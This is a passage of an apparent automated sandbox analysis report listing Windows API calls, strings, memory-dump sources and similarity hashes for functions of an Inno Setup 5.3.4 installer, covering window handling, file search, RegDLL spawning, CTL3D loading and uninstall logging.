• Instruction Fuzzy Hash: 95318871A0160DAFDF10EF66CC41ADEBBBCDB45304F5084B7A808A32A1D7389E45CE58
Uniqueness
Uniqueness Score: -1.00%

APIs
• PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004554C5
• PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004554EC
• SetForegroundWindow.USER32(?), ref: 004554FD
• NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,004557D7,?,00000000,00455813), ref: 004557C2
Strings
• Cannot evaluate variable because [Code] isn't running yet, xrefs: 00455642
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: MessagePostWindow$ForegroundNtdllProc_
• String ID: Cannot evaluate variable because [Code] isn't running yet
• API String ID: 2236967946-3182603685
• Opcode ID: dc33ace31ed7a9797ae01e48b88653b806302b7cb0691c2facf87cd2e3786102
• Instruction ID: 0e8bbef3c373df75fc6cad67ac7c13520a564414c71ee93b02e72d74791e7f0d
• Opcode Fuzzy Hash: dc33ace31ed7a9797ae01e48b88653b806302b7cb0691c2facf87cd2e3786102
• Instruction Fuzzy Hash: EA910034604A44EFD715CF64D961F6ABBF5EB8D704F2080BAE90897792C738AE05CB18
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,004546A8), ref: 004545A4
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004545AA
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetDiskFreeSpaceExA$kernel32.dll
• API String ID: 1646373207-3712701948
• Opcode ID: ed7d07240aa90892a091206af18c35f348ebfaa97add39f3b53ca1f61f412ce1
• Instruction ID: ea8d5c54c38255325536962d047065f6d17d79332955beca5d267283e39a3316
• Opcode Fuzzy Hash: ed7d07240aa90892a091206af18c35f348ebfaa97add39f3b53ca1f61f412ce1
• Instruction Fuzzy Hash: 27317371A04249ABCB01DFA5D882ADFB7F8EF49704F504567E800F7292D67C5D088A68
Uniqueness
Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • IsIconic.USER32(?), ref: 00417C7F
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417C9D
                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417CD3
                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417CFA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Placement$Iconic
                                                                            • String ID: ,
                                                                            • API String ID: 568898626-3772416878
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001,00000000,00460399), ref: 0046020D
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,0046036C,?,00000001,00000000,00460399), ref: 0046029C
                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0046034E,?,00000000,?,00000000,0046036C,?,00000001,00000000,00460399), ref: 0046032E
                                                                            • FindClose.KERNEL32(000000FF,00460355,0046034E,?,00000000,?,00000000,0046036C,?,00000001,00000000,00460399), ref: 00460348
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseErrorFirstModeNext
                                                                            • String ID:
                                                                            • API String ID: 4011626565-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001,00000000,0046083F), ref: 004606CD
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,0046080A,?,00000001,00000000,0046083F), ref: 00460713
                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,004607EC,?,00000000,?,00000000,0046080A,?,00000001,00000000,0046083F), ref: 004607C8
                                                                            • FindClose.KERNEL32(000000FF,004607F3,004607EC,?,00000000,?,00000000,0046080A,?,00000001,00000000,0046083F), ref: 004607E6
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseErrorFirstModeNext
                                                                            • String ID:
                                                                            • API String ID: 4011626565-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004518C3,00000000,004518E4), ref: 0042E6FE
                                                                            • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E729
                                                                            • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004518C3,00000000,004518E4), ref: 0042E736
                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004518C3,00000000,004518E4), ref: 0042E73E
                                                                            • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004518C3,00000000,004518E4), ref: 0042E744
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                            • String ID:
                                                                            • API String ID: 1177325624-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • IsIconic.USER32(?), ref: 0047DB8E
                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 0047DBAC
                                                                            • ShowWindow.USER32(00000000,00000005,00000000,000000F0,00494F8C,0047D3DA,0047D40E,00000000,0047D42E,?,?,00000001,00494F8C), ref: 0047DBCE
                                                                            • ShowWindow.USER32(00000000,00000000,00000000,000000F0,00494F8C,0047D3DA,0047D40E,00000000,0047D42E,?,?,00000001,00494F8C), ref: 0047DBE2
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Show$IconicLong
                                                                            • String ID:
                                                                            • API String ID: 2754861897-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,0045ED24), ref: 0045ECA8
                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0045ED04,?,00000000,?,00000000,0045ED24), ref: 0045ECE4
                                                                            • FindClose.KERNEL32(000000FF,0045ED0B,0045ED04,?,00000000,?,00000000,0045ED24), ref: 0045ECFE
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 3541575487-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • IsIconic.USER32(?), ref: 00424154
                                                                            • SetActiveWindow.USER32(?,?,?,004687FC), ref: 00424161
                                                                              • Part of subcall function 004235BC: ShowWindow.USER32(004105C0,00000009,?,00000000,0041ED14,004238AA,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 004235D7
                                                                              • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021E25AC,0042417A,?,?,?,004687FC), ref: 00423ABF
                                                                            • SetFocus.USER32(00000000,?,?,?,004687FC), ref: 0042418E
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ActiveFocusIconicShow
                                                                            • String ID:
                                                                            • API String ID: 649377781-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • IsIconic.USER32(?), ref: 00417C7F
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417C9D
                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417CD3
                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417CFA
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Placement$Iconic
                                                                            • String ID:
                                                                            • API String ID: 568898626-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CaptureIconic
                                                                            • String ID:
                                                                            • API String ID: 2277910766-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • IsIconic.USER32(?), ref: 0042410B
                                                                              • Part of subcall function 004239F4: EnumWindows.USER32(0042398C), ref: 00423A18
                                                                              • Part of subcall function 004239F4: GetWindow.USER32(?,00000003), ref: 00423A2D
                                                                              • Part of subcall function 004239F4: GetWindowLongA.USER32(?,000000EC), ref: 00423A3C
                                                                              • Part of subcall function 004239F4: SetWindowPos.USER32(00000000,004240CC,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,0042411B,?,?,00423CE3), ref: 00423A72
                                                                            • SetActiveWindow.USER32(?,?,?,00423CE3,00000000,004240CC), ref: 0042411F
                                                                              • Part of subcall function 004235BC: ShowWindow.USER32(004105C0,00000009,?,00000000,0041ED14,004238AA,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 004235D7
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                            • String ID:
                                                                            • API String ID: 2671590913-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,00412745), ref: 00412733
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: NtdllProc_Window
                                                                            • String ID:
                                                                            • API String ID: 4255912815-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00473B5E
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: NtdllProc_Window
                                                                            • String ID:
                                                                            • API String ID: 4255912815-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045B56B
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CryptFour
                                                                            • String ID:
                                                                            • API String ID: 2153018856-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,00469597), ref: 0045B57E
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CryptFour
                                                                            • String ID:
                                                                            • API String ID: 2153018856-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3216699832.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000001.00000002.3216683445.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000001.00000002.3216720555.0000000010002000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3216699832.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000001.00000002.3216683445.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000001.00000002.3216720555.0000000010002000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateMutexA.KERNEL32(00493A74,00000001,00000000,00000000,00456535,?,?,?,00000001,?,0045674F,00000000,00456765,?,00000000,00494628), ref: 0045624D
                                                                            • CreateFileMappingA.KERNEL32(000000FF,00493A74,00000004,00000000,00002018,00000000), ref: 00456285
                                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045650B,?,00493A74,00000001,00000000,00000000,00456535,?,?,?), ref: 004562AC
                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004563B9
                                                                            • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045650B,?,00493A74,00000001,00000000,00000000,00456535), ref: 00456311
                                                                              • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004563D0
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00456409
                                                                            • GetLastError.KERNEL32(00000000,000000FF,?,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045641B
                                                                            • UnmapViewOfFile.KERNEL32(00000000,00456512,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004564ED
                                                                            • CloseHandle.KERNEL32(00000000,00456512,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004564FC
                                                                            • CloseHandle.KERNEL32(00000000,00456512,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00456505
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                                            • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OgE$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp$egE
                                                                            • API String ID: 4012871263-2037318299
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetVersion.KERNEL32(?,00418F60,00000000,?,?,?,00000001), ref: 0041F096
                                                                            • SetErrorMode.KERNEL32(00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0B2
                                                                            • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0BE
                                                                            • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0CC
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F0FC
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F125
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F13A
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F14F
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F164
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F179
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F18E
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F1A3
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F1B8
                                                                            • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F1CD
                                                                            • FreeLibrary.KERNEL32(00000001,?,00418F60,00000000,?,?,?,00000001), ref: 0041F1DF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                            • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                            • API String ID: 2323315520-3614243559
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • InitializeUninstall, xrefs: 0049135A
                                                                            • Setup version: Inno Setup version 5.3.4 (a), xrefs: 00491024
                                                                            • Cannot find utCompiledCode record for this version of the uninstaller, xrefs: 004911A0
                                                                            • Uninstall, xrefs: 00490FD7
                                                                            • UninstallNeedRestart, xrefs: 0049149A, 004914D3
                                                                            • Will not restart Windows automatically., xrefs: 0049160E
                                                                            • Need to restart Windows? %s, xrefs: 0049153B
                                                                            • Removed all? %s, xrefs: 00491464
                                                                            • Original Uninstall EXE: , xrefs: 0049102E
                                                                            • utCompiledCode[1] is invalid, xrefs: 004911DB
                                                                            • Uninstall command line: , xrefs: 00491074
                                                                            • DeinitializeUninstall, xrefs: 004916A4
                                                                            • Will restart because UninstallNeedRestart returned True., xrefs: 004914EA
                                                                            • Install was done in 64-bit mode but not running 64-bit Windows now, xrefs: 00491215
                                                                            • InitializeUninstall returned False; aborting., xrefs: 00491392
                                                                            • Uninstall DAT: , xrefs: 00491051
                                                                            • Not calling UninstallNeedRestart because a restart has already been deemed necessary., xrefs: 00491519
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$Show
                                                                            • String ID: Cannot find utCompiledCode record for this version of the uninstaller$DeinitializeUninstall$InitializeUninstall$InitializeUninstall returned False; aborting.$Install was done in 64-bit mode but not running 64-bit Windows now$Need to restart Windows? %s$Not calling UninstallNeedRestart because a restart has already been deemed necessary.$Original Uninstall EXE: $Removed all? %s$Setup version: Inno Setup version 5.3.4 (a)$Uninstall$Uninstall DAT: $Uninstall command line: $UninstallNeedRestart$Will not restart Windows automatically.$Will restart because UninstallNeedRestart returned True.$utCompiledCode[1] is invalid
                                                                            • API String ID: 3609083571-540932686
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • 73A0A570.USER32(00000000,?,0041A8B4,?), ref: 0041C9B0
                                                                            • 73A14C40.GDI32(?,00000000,?,0041A8B4,?), ref: 0041C9BC
                                                                            • 73A16180.GDI32(0041A8B4,?,00000001,00000001,00000000,00000000,0041CBD2,?,?,00000000,?,0041A8B4,?), ref: 0041C9E0
                                                                            • 73A14C00.GDI32(?,0041A8B4,?,00000000,0041CBD2,?,?,00000000,?,0041A8B4,?), ref: 0041C9F0
                                                                            • SelectObject.GDI32(0041CDAC,00000000), ref: 0041CA0B
                                                                            • FillRect.USER32(0041CDAC,?,?), ref: 0041CA46
                                                                            • SetTextColor.GDI32(0041CDAC,00000000), ref: 0041CA5B
                                                                            • SetBkColor.GDI32(0041CDAC,00000000), ref: 0041CA72
                                                                            • PatBlt.GDI32(0041CDAC,00000000,00000000,0041A8B4,?,00FF0062), ref: 0041CA88
                                                                            • 73A14C40.GDI32(?,00000000,0041CB8B,?,0041CDAC,00000000,?,0041A8B4,?,00000000,0041CBD2,?,?,00000000,?,0041A8B4), ref: 0041CA9B
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041CACC
